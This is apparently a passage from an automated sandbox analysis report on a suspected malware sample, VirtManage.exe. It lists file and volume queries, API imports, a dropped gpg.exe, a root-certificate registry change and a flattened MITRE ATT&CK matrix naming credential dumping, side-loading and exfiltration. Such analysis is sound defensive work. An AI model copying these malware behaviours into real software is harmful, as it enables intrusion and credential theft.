Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403552
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\503006091D97D4F5AE39F7CBE7927D7D652D3431 BlobJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_0049C5F0 sqlite3_db_handle,sqlite3_bind_parameter_count,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_prepare_v2,sqlite3_bind_blob,sqlite3_bind_text,sqlite3_step,sqlite3_column_text,sqlite3_column_type,sqlite3_step,gcry_free,sqlite3_reset,sqlite3_errstr,strlen,sqlite3_malloc,memcpy,sqlite3_column_count,gcry_xmalloc,sqlite3_column_name,sqlite3_errmsg,strlen,sqlite3_malloc,memcpy,sqlite3_finalize,gpgrt_log_fatal,_gpgrt_log_assert,gpgrt_log_fatal,_gpgrt_log_assert,gpgrt_log_fatal,gpgrt_log_fatal,gpgrt_log_fatal,strlen,_gpg_w32_gettext,1_2_0049C5F0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004AC8D0 _gpg_w32_bindtextdomain,_gpg_w32_textdomain,1_2_004AC8D0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0049C5F0 sqlite3_db_handle,sqlite3_bind_parameter_count,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_prepare_v2,sqlite3_bind_blob,sqlite3_bind_text,sqlite3_step,sqlite3_column_text,sqlite3_column_type,sqlite3_step,gcry_free,sqlite3_reset,sqlite3_errstr,strlen,sqlite3_malloc,memcpy,sqlite3_column_count,gcry_xmalloc,sqlite3_column_name,sqlite3_errmsg,strlen,sqlite3_malloc,memcpy,sqlite3_finalize,gpgrt_log_fatal,_gpgrt_log_assert,gpgrt_log_fatal,_gpgrt_log_assert,gpgrt_log_fatal,gpgrt_log_fatal,gpgrt_log_fatal,strlen,_gpg_w32_gettext,3_2_0049C5F0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004AC8D0 _gpg_w32_bindtextdomain,_gpg_w32_textdomain,3_2_004AC8D0

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Replication Through Removable Media		1
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Disable or Modify Tools		OS Credential Dumping11
Peripheral Device Discovery		Remote Services1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts112
Command and Scripting Interpreter		1
DLL Search Order Hijacking		1
DLL Search Order Hijacking		11
Deobfuscate/Decode Files or Information		LSASS Memory2
File and Directory Discovery		Remote Desktop Protocol1
Clipboard Data		21
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
